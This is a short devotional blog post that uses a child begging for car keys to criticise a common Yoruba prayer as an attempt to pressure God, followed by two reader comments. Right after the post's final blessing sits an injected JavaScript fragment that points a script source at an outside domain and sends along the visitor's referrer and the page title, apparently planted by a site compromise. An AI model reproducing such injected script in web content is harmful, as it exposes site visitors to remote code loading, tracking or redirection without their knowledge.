IMAGINE THIS…….

imagine_this

Your 7 year old son/nephew comes begging for your car keys. He tells you he’ll just be needing it for about 30mins, and that he’ll be back from the neighborhood real quick! You’ll not only be shocked, but upset! Imagine you refusing him blatantly and he goes ahead to plead seriously, telling you that you shouldn’t make people ask if he has no parents to give him the car he so badly needs!

Of course, that’s not only blackmail, it’s an outright display of gross immaturity! Chai! A part of you will want to spank him real good, the voice of reason in you may make you see the need to educate him properly. But inherently, you’ll be really bothered. Am I correct?

Ok, let’s come to us ADULTS. Take a look at the statement below:

Ma je ki aye bere wipe nibo ni Olorun mi wa”.

Alright, alright, i know that was a little tongue twisting for my non Yoruba friends. If you are Yoruba, and you grew up in a religious home or setting, you would’ve heard the above prayer before, most likely from the Mummies in the house. The prayer in English means, “Don’t let the world/people ask me that where is my God”. That’s telling God that it really doesn’t matter whether what you’re asking for can harm you, is bad timing for you, etc. He should just do it to save His face and name; so people won’t be asking whether you really have a father.

My charge for you is simple. If you know God and understand Him, you will know that He will answer our prayers once they’re aligned with His will. When we ask to consume it on our own lusts, it’s called asking amiss, in which case, we are praying to the god of the belly, not the living God.

God wants all men saved. He wants to take the glory and have preeminence in all things. He wants every tribe and tongue proclaiming His Lordship. He’s unquestionable, and His ways are past finding out……Kabio o si! He can kill and make alive! So, does it make sense to want to arm-twist Him?

Friend, don’t try to use God to suit what you want. Don’t corner or try to make Him do your bidding.

14 So, my very dear friends, when you see people reducing God to something they can use or control, get out of their company as fast as you can. (I Cor 10:14 MSG)

He that has ears…..

God bless you and have a fantastic day!s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

    Spot on! It bothers me that it doesn’t bother many of us.

    I won’t even think of spanking my child, I will think he is joking. So many of us are just joking then! 🙂
